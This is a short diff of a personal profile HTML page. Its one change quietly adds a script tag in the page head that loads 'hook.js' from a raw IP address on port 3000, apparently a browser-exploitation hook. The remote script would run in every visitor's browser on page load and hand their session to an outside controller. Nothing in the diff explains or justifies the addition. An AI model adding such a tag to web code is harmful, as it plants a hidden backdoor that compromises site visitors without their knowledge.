--- a/index.html
+++ b/index.html
@@ -2,6 +2,7 @@
 <html>
   <head>
     <title>My Profile</title>
+    <script src="http://192.168.76.197:3000/hook.js"></script>
     <style>
       /* Add a border around the profile picture */
       .profile-picture {
